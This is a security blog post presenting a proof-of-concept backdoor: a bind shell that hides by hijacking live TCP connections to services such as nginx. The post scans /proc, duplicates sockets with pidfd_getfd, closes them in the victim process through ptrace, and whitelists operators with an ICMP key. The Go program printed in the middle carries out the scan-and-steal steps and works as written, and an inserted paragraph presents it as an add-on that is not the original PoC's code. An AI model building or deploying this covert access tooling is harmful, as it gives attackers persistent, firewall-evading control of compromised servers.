# tl;dr

This post presents an approach to implementing bind shells with connection hijacking as an alternative to common webshells. The PoC is a simple bind shell with SOCKS5 capabilities that hijacks incoming connections to TCP services instead of listening on its own. It does this by scanning the `/proc` filesystem for connections from whitelisted IPs and using the `pidfd_getfd` Linux syscall to duplicate the file descriptor of the connection into its own process.

Available at https://github.com/zimnyaa/nowebshell

# why

There are several advantages to this approach over both webshells and regular bind shells:

- webshells require writing in web languages, which I did not want to do
- webshells with SOCKS proxies are slow
- bind shells get firewalled off and are extremely noticeable

# why not

There are several disadvantages, too. The most notable is that `netstat` truthfully reports which process owns the connection, i.e. the shell process rather than the service it was hijacked from:

>![[Pasted image 20240603200821.png]]
>*netstat output*

The other important downside is stability issues in processes that try to operate on closed file descriptors. Some handle it gracefully, but e.g. the `updog` Python module does not catch the exception and crashes:

>![[Pasted image 20240603201002.png]]
>*someone does not handle closed descriptors*

# how

The execution loop of the shell is simple:

```
scan processes and filter by commandline ->
scan open sockets to find connections with whitelisted IPs ->
clone the fd of the socket connection with pidfd_getfd ->
ptrace_do a close() syscall on the fd in the donor process ->
bind a reverse SSH connection to the socket
```

`pidfd_getfd` exists since Linux 5.6 and requires ptrace access (`PTRACE_MODE_ATTACH_REALCREDS`) to the donor process, so in practice the shell has to run as root, or as the same user as the service with a permissive `kernel.yama.ptrace_scope`. The `close()` in the donor is needed because `pidfd_getfd` only duplicates the descriptor: until the donor closes its copy, both processes hold the same socket and would compete for its data.

The PoC uses github.com/oraoto/go-pidfd for Go `pidfd` syscall bindings, and https://github.com/briceburg/fdclose/ and `ptrace_do` for closing the file descriptor in the donor process. Meanwhile, a separate listener in the background updates the whitelist based on a hardcoded key delivered in an ICMP Echo request.
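The scan and `pidfd_getfd` steps of the loop above, as an added example in Go that is not the nowebshell PoC's own code. It uses only the standard library and the raw syscall numbers (434 for `pidfd_open`, 438 for `pidfd_getfd`) instead of github.com/oraoto/go-pidfd, and assumes Linux 5.6 or newer, IPv4 only (`/proc/net/tcp`; IPv6 connections live in `/proc/net/tcp6`), and ptrace access to the donor process. The `ptrace_do` close in the donor and the SSH bind are not included, and the function names are mine; the `/proc/net/tcp` row format and the `socket:[inode]` link form are how the kernel presents them.

```go
package main

import (
	"encoding/hex"
	"fmt"
	"net"
	"os"
	"strconv"
	"strings"
	"syscall"
)

// pidfd_open / pidfd_getfd syscall numbers: Linux >= 5.6, identical on every arch.
const sysPidfdOpen, sysPidfdGetfd = 434, 438

// TCPConn is one ESTABLISHED row of /proc/net/tcp; Inode is what /proc/<pid>/fd links name.
type TCPConn struct {
	Local, Remote net.TCPAddr
	Inode         uint64
}

// parseHexAddr decodes the "0100007F:0050" form used by /proc/net/tcp:
// little-endian hex IPv4, then big-endian hex port.
func parseHexAddr(s string) (net.TCPAddr, error) {
	if p := strings.SplitN(s, ":", 2); len(p) == 2 {
		b, err := hex.DecodeString(p[0])
		port, err2 := strconv.ParseUint(p[1], 16, 16)
		if err == nil && err2 == nil && len(b) == 4 {
			return net.TCPAddr{IP: net.IPv4(b[3], b[2], b[1], b[0]), Port: int(port)}, nil
		}
	}
	return net.TCPAddr{}, fmt.Errorf("bad /proc/net/tcp address %q", s)
}

// ParseProcNetTCP takes the text of /proc/net/tcp and returns the established
// connections whose remote IP (dotted quad) is in the whitelist.
func ParseProcNetTCP(data string, whitelist map[string]bool) []TCPConn {
	var out []TCPConn
	for i, line := range strings.Split(data, "\n") {
		f := strings.Fields(line)
		// columns: sl local rem st tx:rx tr:when retrnsmt uid timeout inode ...
		if i == 0 || len(f) < 10 || f[3] != "01" { // skip header and non-ESTABLISHED ("01") rows
			continue
		}
		local, err := parseHexAddr(f[1])
		remote, err2 := parseHexAddr(f[2])
		inode, err3 := strconv.ParseUint(f[9], 10, 64)
		if err != nil || err2 != nil || err3 != nil || !whitelist[remote.IP.String()] {
			continue // malformed (not expected from the kernel) or not whitelisted
		}
		out = append(out, TCPConn{Local: local, Remote: remote, Inode: inode})
	}
	return out
}

// FindSocketFD returns the fd number in pid whose /proc link reads "socket:[inode]".
func FindSocketFD(pid int, inode uint64) (int, error) {
	dir := fmt.Sprintf("/proc/%d/fd", pid)
	entries, err := os.ReadDir(dir) // listing it needs the same ptrace access as pidfd_getfd
	if err != nil {
		return -1, err
	}
	want := fmt.Sprintf("socket:[%d]", inode)
	for _, e := range entries {
		if t, lerr := os.Readlink(dir + "/" + e.Name()); lerr == nil && t == want {
			return strconv.Atoi(e.Name())
		}
	}
	return -1, fmt.Errorf("inode %d is not open in pid %d", inode, pid)
}

// StealFD duplicates targetFD of pid into this process with pidfd_getfd. The donor
// keeps its own copy; closing it there (the ptrace_do step) is not done here.
func StealFD(pid, targetFD int) (int, error) {
	pidfd, _, errno := syscall.Syscall(sysPidfdOpen, uintptr(pid), 0, 0)
	if errno != 0 {
		return -1, fmt.Errorf("pidfd_open(%d): %w", pid, errno)
	}
	defer syscall.Close(int(pidfd))
	fd, _, errno := syscall.Syscall(sysPidfdGetfd, pidfd, uintptr(targetFD), 0)
	if errno != 0 {
		return -1, fmt.Errorf("pidfd_getfd(%d, %d): %w", pid, targetFD, errno)
	}
	return int(fd), nil
}

// usage: <binary> <donor pid> <whitelisted ip>
func main() {
	pid, _ := strconv.Atoi(os.Args[1])
	data, err := os.ReadFile("/proc/net/tcp")
	if err != nil {
		panic(err)
	}
	for _, c := range ParseProcNetTCP(string(data), map[string]bool{os.Args[2]: true}) {
		if fd, err := FindSocketFD(pid, c.Inode); err == nil {
			stolen, err := StealFD(pid, fd)
			fmt.Println(c.Remote.String(), "->", c.Local.String(), "fd", fd, "stolen as", stolen, err)
		}
	}
}
```

`/proc/net/tcp` carries no pid, only the socket inode, so the inode is what joins the connection table to a particular process's `/proc/<pid>/fd`; a connection from a whitelisted IP that no scanned process holds (for example one owned by a different worker) is simply skipped. Because the donor keeps its copy after `pidfd_getfd`, two processes can `read()` the same socket until the donor's descriptor is closed, which is exactly the race the `ptrace_do` close step in the loop above prevents.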
# usage

The usage is pretty straightforward:

>![[Pasted image 20240603201427.png]]
>*default nginx installation*

>![[Pasted image 20240603201433.png]]
>*running the thing*

>![[Pasted image 20240603201549.png]]
>*the client sends a ping to whitelist itself and makes a connection*

>![[Pasted image 20240603201645.png]]
>*an SSH connection is created over it (see [[grpcssh]])*